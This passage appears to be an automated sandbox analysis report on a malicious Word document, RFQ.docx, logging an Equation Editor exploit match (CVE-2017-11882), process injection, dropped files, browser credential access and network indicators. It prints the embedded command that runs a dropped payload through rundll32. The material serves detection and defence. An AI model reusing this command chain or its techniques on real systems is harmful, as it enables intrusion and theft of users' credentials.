              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: convert.exe, 0000000B.00000003.541747443.0000000005C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.diced.jp/~lizard581/cgi-bin/imageup/data/1424.jpg
              Source: 2-4C93H.11.drString found in binary or memory: https://www.google.com/favicon.ico
              Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
              Source: unknownHTTPS traffic detected: 153.121.40.91:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

              E-Banking Fraud

              Source: Yara matchFile source: 9.2.ImagingDevices.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.553330249.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648308986.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497567649.0000000002200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drStream path '_1792802952/Equation Native' : ...............\.[.............ZZCmD.exe /C rundll32 %tmp%\xwizard.,IEX A..C................................................................................................................
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drStream path '_1792802956/Equation Native' : ...............\.[.............ZZCmD.exe /C rundll32 %tmp%\xwizard.,IEX A..C................................................................................................................
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\xwizard
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess Stats: CPU usage > 49%
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and write
              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Windows\SysWOW64\convert.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0042C563 NtClose,9_2_0042C563
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0040AB17 NtResumeThread,9_2_0040AB17
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008807AC NtCreateMutant,LdrInitializeThunk,9_2_008807AC
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087F9F0 NtClose,LdrInitializeThunk,9_2_0087F9F0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_0087FAE8
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_0087FB68
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_0087FDC0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008800C4 NtCreateFile,9_2_008800C4
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008810D0 NtOpenProcessToken,9_2_008810D0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00880048 NtProtectVirtualMemory,9_2_00880048
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00880060 NtQuerySection,9_2_00880060
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00880078 NtResumeThread,9_2_00880078
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008801D4 NtSetValueKey,9_2_008801D4
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0088010C NtOpenDirectoryObject,9_2_0088010C
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00881148 NtOpenThread,9_2_00881148
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087F8CC NtWaitForSingleObject,9_2_0087F8CC
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087F900 NtReadFile,9_2_0087F900
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00881930 NtSetContextThread,9_2_00881930
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087F938 NtWriteFile,9_2_0087F938
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FAB8 NtQueryValueKey,9_2_0087FAB8
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FAD0 NtAllocateVirtualMemory,9_2_0087FAD0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FA20 NtQueryInformationFile,9_2_0087FA20
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FA50 NtEnumerateValueKey,9_2_0087FA50
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FBB8 NtQueryInformationToken,9_2_0087FBB8
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FBE8 NtQueryVirtualMemory,9_2_0087FBE8
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FB50 NtCreateKey,9_2_0087FB50
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FC90 NtUnmapViewOfSection,9_2_0087FC90
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FC30 NtOpenProcess,9_2_0087FC30
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00880C40 NtGetContextThread,9_2_00880C40
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FC48 NtSetInformationFile,9_2_0087FC48
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FC60 NtMapViewOfSection,9_2_0087FC60
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00881D80 NtSuspendThread,9_2_00881D80
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FD8C NtDelayExecution,9_2_0087FD8C
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FD5C NtEnumerateKey,9_2_0087FD5C
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FEA0 NtReadVirtualMemory,9_2_0087FEA0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FED0 NtAdjustPrivilegesToken,9_2_0087FED0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FE24 NtWriteVirtualMemory,9_2_0087FE24
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FFB4 NtCreateSection,9_2_0087FFB4
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FFFC NtCreateProcessEx,9_2_0087FFFC
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FF34 NtQueueApcThread,9_2_0087FF34
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 6710D91D77E1937DD5B46D96C0852042985DC78C4C51CE12D3E07A4CDB12C202
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\wcC8DC.tmp 22F72938B6ADEF7A0832E2856AD1F72A1C4400D0CE0DD9AECF87F68118FFE921
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: String function: 008D3F92 appears 132 times
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: String function: 008D373B appears 245 times
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: String function: 008FF970 appears 84 times
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: String function: 0088E2A8 appears 41 times
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: String function: 0088DF5C appears 123 times
              Source: sqlite3.dll.11.drStatic PE information: Number of sections : 18 > 10
              Source: wcC8DC.tmp.6.drStatic PE information: No import functions for PE file found
              Source: xwizard.1.drStatic PE information: No import functions for PE file found
              Source: C:\Windows\SysWOW64\convert.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
              Source: wcC8DC.tmp.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: wcC8DC.tmp.6.drStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOCX@14/19@8/7
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$RFQ.docx
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA2E3.tmp
              Source: ~WRD0000.tmp.1.drOLE indicator, Word Document stream: true
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drOLE document summary: title field not present or empty
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drOLE document summary: author field not present or empty
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drOLE document summary: edited time not present or 0
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\convert.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: RFQ.docxReversingLabs: Detection: 15%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeProcess created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
              Source: C:\Windows\SysWOW64\convert.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wow64win.dll
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: wow64win.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: ifsutil.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: scecli.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: osuninst.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: rpcrtremote.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: mozglue.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: webio.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: wdscore.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: cryptui.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: riched32.dll
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: riched20.dll
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: winnsi.dll
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: dhcpcsvc.dll
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\convert.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
              Source: RFQ.LNK.1.drLNK file: ..\..\..\..\..\Desktop\RFQ.docx
              Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: ImagingDevices.pdb source: convert.exe, 0000000B.00000002.648888514.000000000287C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 0000000B.00000002.648352209.0000000000200000.00000004.00000020.00020000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000000.510314863.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.553400989.000000000126C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: convert.pdb source: ImagingDevices.exe, 00000009.00000002.497445868.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000A.00000002.648365477.0000000000744000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mVjlVtpvDsvJ.exe, 0000000A.00000002.648477658.000000000126E000.00000002.00000001.01000000.00000004.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648546360.000000000126E000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: wntdll.pdb source: ImagingDevices.exe, ImagingDevices.exe, 00000009.00000003.476693111.0000000000450000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000002.497469157.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000003.477063073.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648597761.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.497780980.0000000001E40000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.497414077.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648597761.0000000002150000.00000040.00001000.00020000.00000000.sdmp
              Source: ~WRD0000.tmp.1.dr - Initial sample: OLE indicators vbamacros = False
              Source: sqlite3.dll.11.dr - Static PE information: section name: /4
              Source: sqlite3.dll.11.dr - Static PE information: section name: /19
              Source: sqlite3.dll.11.dr - Static PE information: section name: /31
              Source: sqlite3.dll.11.dr - Static PE information: section name: /45
              Source: sqlite3.dll.11.dr - Static PE information: section name: /57
              Source: sqlite3.dll.11.dr - Static PE information: section name: /70
              Source: sqlite3.dll.11.dr - Static PE information: section name: /81
              Source: sqlite3.dll.11.dr - Static PE information: section name: /92
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00411857 push edi; iretd 9_2_0041186A
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00411863 push edi; iretd 9_2_0041186A
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00418065 push cs; ret 9_2_0041806D
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_0040E966 push esp; ret 9_2_0040E967
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00415BA3 push ebx; retn 7AC1h 9_2_00415CFB
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00403450 push eax; ret 9_2_00403452
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00411C61 push ebp; retf 9_2_00411C62
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_0040AC36 push ds; ret 9_2_0040AC37
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00404DB3 push esi; ret 9_2_00404DB4
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00401E45 push FFFFFFEDh; ret 9_2_00401E52
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00404E6A push AFC6F9A9h; retf 9_2_00404E7B
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00401ED9 pushfd ; iretd 9_2_00401EF2
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_004066F7 push eax; ret 9_2_004066FA
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00414694 push esp; iretd 9_2_00414585
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_0088DFA1 push ecx; ret 9_2_0088DFB4
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Code function: 10_2_0460C424 push cs; ret 10_2_0460C42C
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Code function: 10_2_04605C16 push edi; iretd 10_2_04605C29
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Code function: 10_2_04602D25 push esp; ret 10_2_04602D26
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Code function: 10_2_04613629 push es; retf 10_2_0461362F
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Code function: 10_2_0460A635 pushad ; ret 10_2_0460A638
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Code function: 10_2_045FEFF5 push ds; ret 10_2_045FEFF6
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Code function: 10_2_04606020 push ebp; retf 10_2_04606021
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Code function: 10_2_045F9172 push esi; ret 10_2_045F9173
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Code function: 10_2_045F9229 push AFC6F9A9h; retf 10_2_045F923A
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Code function: 10_2_045FAAB6 push eax; ret 10_2_045FAAB9
              Source: wcC8DC.tmp.6.dr - Static PE information: section name: .text entropy: 7.994238159441129
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE - File created: C:\Users\user\AppData\Local\Temp\xwizard
              Source: C:\Windows\SysWOW64\convert.exe - File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll
              Source: C:\Windows\System32\rundll32.exe - File created: C:\Users\user\AppData\Local\Temp\wcC8DC.tmp

              Boot Survival

